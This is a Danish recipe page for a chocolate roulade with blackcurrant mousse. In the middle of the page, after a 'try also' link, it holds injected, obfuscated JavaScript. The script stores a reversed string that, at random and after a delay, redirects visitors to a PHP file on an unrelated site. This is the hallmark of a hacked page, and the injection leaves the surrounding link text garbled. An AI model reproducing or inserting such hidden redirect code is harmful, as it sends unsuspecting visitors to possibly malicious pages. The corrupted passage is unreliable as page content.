Chokoladeroulade med solbærmousse

Den let bitre og dybe chokoladesmag passer rigtig godt sammen med de syrlige solbær med bærrenes kant af grønne krydderurter. Resultatet er en sød kage med en frisk og luftig creme – ideel til en kop kaffe, for den krydrede kaffesmag passer eminent til solbær.

Opskrift på 1 roulade

Solbærmousse:
2 dl solbær, blendet til en pure
1 dl sukker
2 blade husblas
1 æggehvide, past.
½ dl sukker
1 spsk citronsaft
1 dl fløde
2 spsk flormelis

Chokoladeroulade:
4 æg, delt i hvider og blommer
70 g sukker
15 g kakaopulver
20 g kartoffelmel
20 g mel
½ tsk bagepulver
50 g mørk chokolade, smeltet
Sukker, til drys
Flormelis, til drys

Prøv også $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard&_thumbnail_id=4166&preview=true”>Raw chokoladekage med ribs, hindbær og blåbær

Solbærmousse: Blend solbærrene til en pure, og smag til med sukker. Udblød husblassen i koldt vand i ca. 5 min. Varm halvdelen af solbærpureen let op i en gryde (til ca. 50 grader, så det skal ikke koge), knug vandet af husblassen, og lad den smelte forsigtigt i den varme pure. Tilsæt resten af pureen til blandingen, og lad den køle af. Pisk æggehviden stiv i en skål, og pisk sukkeret i til en skinnende masse. Pisk citronsaft i. Pisk fløden til skum i en anden skål med flormelis. Vend æggehvider, flødeskum og solbærpure forsigtigt sammen til en ensartet masse, og lad det køle af i en ½ time i køleskabet.
Chokoladeroulade: Pisk æggeblommer og sukker sammen i en skål til en tyk og lys masse. Fold kakaopulver, kartoffelmel, mel og bagepulver forsigtigt ind i massen, og vend derefter forsigtigt den smeltede chokolade i. Pisk æggehviderne stive i en anden skål, og vend dem forsigtigt i chokolademassen. Smør massen ud i et jævnt lag på en bageplade beklædt med bagepapir med bagsiden af en ske (massen skal fylde hele bagepladen), og bag den i ovnen ved 180 grader i 10-12 min. Drys dejen med lidt sukker, og læg et stykke bagepapir over. Vend hele molevitten, og træk forsigtigt det gamle bagepapir af. Rul den stadigt varme dej sammen, og fold et viskestykke eller et håndklæde rundt om for at holde på formen. Når kagen er kølet godt af, kan både bagepapir og håndklæde fjernes. Fordel moussen over dejen, og rul den forsigtigt sammen til en roulade. Drys med flormelis, og server.

 

 

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere